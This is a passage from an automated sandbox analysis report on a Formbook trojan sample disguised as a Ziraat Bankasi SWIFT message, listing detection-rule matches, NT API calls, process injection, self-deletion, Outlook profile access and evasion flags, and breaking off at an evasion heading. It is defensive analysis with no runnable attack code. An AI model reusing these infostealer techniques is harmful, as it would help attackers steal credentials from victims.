      Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221121.exe PID: 60, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: cscript.exe PID: 2876, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 0_2_026AE4C00_2_026AE4C0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 0_2_026AC4DC0_2_026AC4DC
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 0_2_026AE4D00_2_026AE4D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 0_2_0716003A0_2_0716003A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 0_2_071600400_2_07160040
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C25811_2_018C2581
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019625DD1_2_019625DD
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AD5E01_2_018AD5E0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0189F9001_2_0189F900
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01962D071_2_01962D07
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01890D201_2_01890D20
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B41201_2_018B4120
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01961D551_2_01961D55
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018AB0901_2_018AB090
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018C20A01_2_018C20A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019620A81_2_019620A8
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019628EC1_2_019628EC
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018A841F1_2_018A841F
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019510021_2_01951002
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195D4661_2_0195D466
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018CEBB01_2_018CEBB0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0195DBD21_2_0195DBD2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01961FF11_2_01961FF1
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01962B281_2_01962B28
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_019622AE1_2_019622AE
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_01962EF71_2_01962EF7
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018B6E301_2_018B6E30
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004012AC1_2_004012AC
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004228FF1_2_004228FF
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004223301_2_00422330
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0040B4471_2_0040B447
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004044C71_2_004044C7
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004044BE1_2_004044BE
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0042258E1_2_0042258E
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0040FE771_2_0040FE77
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004046E71_2_004046E7
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: String function: 0189B150 appears 35 times
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D99A0 NtCreateSection,LdrInitializeThunk,1_2_018D99A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D95D0 NtClose,LdrInitializeThunk,1_2_018D95D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_018D9910
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9540 NtReadFile,LdrInitializeThunk,1_2_018D9540
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_018D98F0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9840 NtDelayExecution,LdrInitializeThunk,1_2_018D9840
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_018D9860
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9780 NtMapViewOfSection,LdrInitializeThunk,1_2_018D9780
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_018D97A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9FE0 NtCreateMutant,LdrInitializeThunk,1_2_018D9FE0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9710 NtQueryInformationToken,LdrInitializeThunk,1_2_018D9710
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_018D96E0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_018D9A00
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9A20 NtResumeThread,LdrInitializeThunk,1_2_018D9A20
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9A50 NtCreateFile,LdrInitializeThunk,1_2_018D9A50
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_018D9660
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D99D0 NtCreateProcessEx,1_2_018D99D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D95F0 NtQueryInformationFile,1_2_018D95F0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9520 NtWaitForSingleObject,1_2_018D9520
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018DAD30 NtSetContextThread,1_2_018DAD30
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9950 NtQueueApcThread,1_2_018D9950
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9560 NtWriteFile,1_2_018D9560
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D98A0 NtWriteVirtualMemory,1_2_018D98A0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9820 NtEnumerateKey,1_2_018D9820
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018DB040 NtSuspendThread,1_2_018DB040
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018DA3B0 NtGetContextThread,1_2_018DA3B0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9B00 NtSetValueKey,1_2_018D9B00
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018DA710 NtOpenProcessToken,1_2_018DA710
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9730 NtQueryVirtualMemory,1_2_018D9730
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9760 NtOpenProcess,1_2_018D9760
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9770 NtSetInformationFile,1_2_018D9770
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018DA770 NtOpenThread,1_2_018DA770
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9A80 NtOpenDirectoryObject,1_2_018D9A80
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D96D0 NtCreateKey,1_2_018D96D0
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9610 NtEnumerateValueKey,1_2_018D9610
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9A10 NtQuerySection,1_2_018D9A10
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9650 NtQueryValueKey,1_2_018D9650
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018D9670 NtQueryInformationProcess,1_2_018D9670
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0041E057 NtAllocateVirtualMemory,1_2_0041E057
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004012AC NtProtectVirtualMemory,1_2_004012AC
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0041DE77 NtCreateFile,1_2_0041DE77
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0041DF27 NtReadFile,1_2_0041DF27
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0041DFA7 NtClose,1_2_0041DFA7
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004014E9 NtProtectVirtualMemory,1_2_004014E9
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0041DFA1 NtClose,1_2_0041DFA1
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.281405416.0000000006F20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs Ziraat Bankasi Swift Mesaji20221121.exe
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000002.267598949.0000000003A32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs Ziraat Bankasi Swift Mesaji20221121.exe
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000000.00000000.238706648.0000000000350000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameglQl.exeT vs Ziraat Bankasi Swift Mesaji20221121.exe
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.263332399.00000000017F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221121.exe
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221121.exe
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.261306164.0000000001658000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji20221121.exe
      Source: Ziraat Bankasi Swift Mesaji20221121.exeBinary or memory string: OriginalFilenameglQl.exeT vs Ziraat Bankasi Swift Mesaji20221121.exe
      Source: Ziraat Bankasi Swift Mesaji20221121.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: Ziraat Bankasi Swift Mesaji20221121.exeReversingLabs: Detection: 28%
      Source: Ziraat Bankasi Swift Mesaji20221121.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ziraat Bankasi Swift Mesaji20221121.exe.logJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeFile created: C:\Users\user~1\AppData\Local\Temp\q3W1-4699Jump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@5/4
      Source: Ziraat Bankasi Swift Mesaji20221121.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Ziraat Bankasi Swift Mesaji20221121.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: Ziraat Bankasi Swift Mesaji20221121.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.262531212.00000000016D4000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.260023357.0000000001542000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000003.375312551.0000000004350000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.512812391.000000000460F000.00000040.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000003.372564961.00000000041B4000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.511277119.00000000044F0000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Ziraat Bankasi Swift Mesaji20221121.exe, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.262531212.00000000016D4000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221121.exe, 00000001.00000003.260023357.0000000001542000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000003.375312551.0000000004350000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.512812391.000000000460F000.00000040.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000003.372564961.00000000041B4000.00000004.00000800.00020000.00000000.sdmp, cscript.exe, 0000000A.00000002.511277119.00000000044F0000.00000040.00000800.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Source: Ziraat Bankasi Swift Mesaji20221121.exe, Home.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: 0.0.Ziraat Bankasi Swift Mesaji20221121.exe.2a0000.0.unpack, Home.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 0_2_026AF8D8 push ss; iretd 0_2_026AFBDE
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 0_2_026AC6C0 push ss; iretd 0_2_026AC6CA
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 0_2_07163E15 push ebx; ret 0_2_07163E16
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_018ED0D1 push ecx; ret 1_2_018ED0E4
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0042106C push eax; ret 1_2_004210BF
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004210C2 push eax; ret 1_2_00421129
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004210B9 push eax; ret 1_2_004210BF
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_00421123 push eax; ret 1_2_00421129
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004059B6 push cs; ret 1_2_004059B7
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0040EA2F push eax; retf 1_2_0040EA37
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0041ABC4 push ss; iretd 1_2_0041ABC5
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_0041AD59 push esp; iretd 1_2_0041AD5A
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004215D0 push esp; iretd 1_2_004215D2
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_00419D81 push ebx; ret 1_2_00419D82
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_00409EC0 push ds; ret 1_2_00409EC8
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004226F0 push dword ptr [65B62A56h]; ret 1_2_00422711
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_00419F6C push eax; ret 1_2_00419F6D
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_004057C5 push FFFFFFB8h; ret 1_2_004057D3
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeCode function: 1_2_00416FCD push ecx; retf 1_2_00416FD1
      Source: initial sampleStatic PE information: section name: .text entropy: 7.366462470507414

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: C:\Windows\SysWOW64\cscript.exeFile deleted: c:\users\user\desktop\ziraat bankasi swift mesaji20221121.exeJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221121.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
